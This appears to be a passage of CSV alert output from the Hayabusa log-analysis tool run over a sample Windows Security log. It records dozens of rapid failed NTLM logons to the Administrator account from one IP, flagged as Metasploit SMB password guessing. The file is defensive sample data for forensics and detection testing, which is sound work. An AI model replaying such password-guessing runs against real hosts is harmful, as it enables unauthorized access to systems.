SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: 
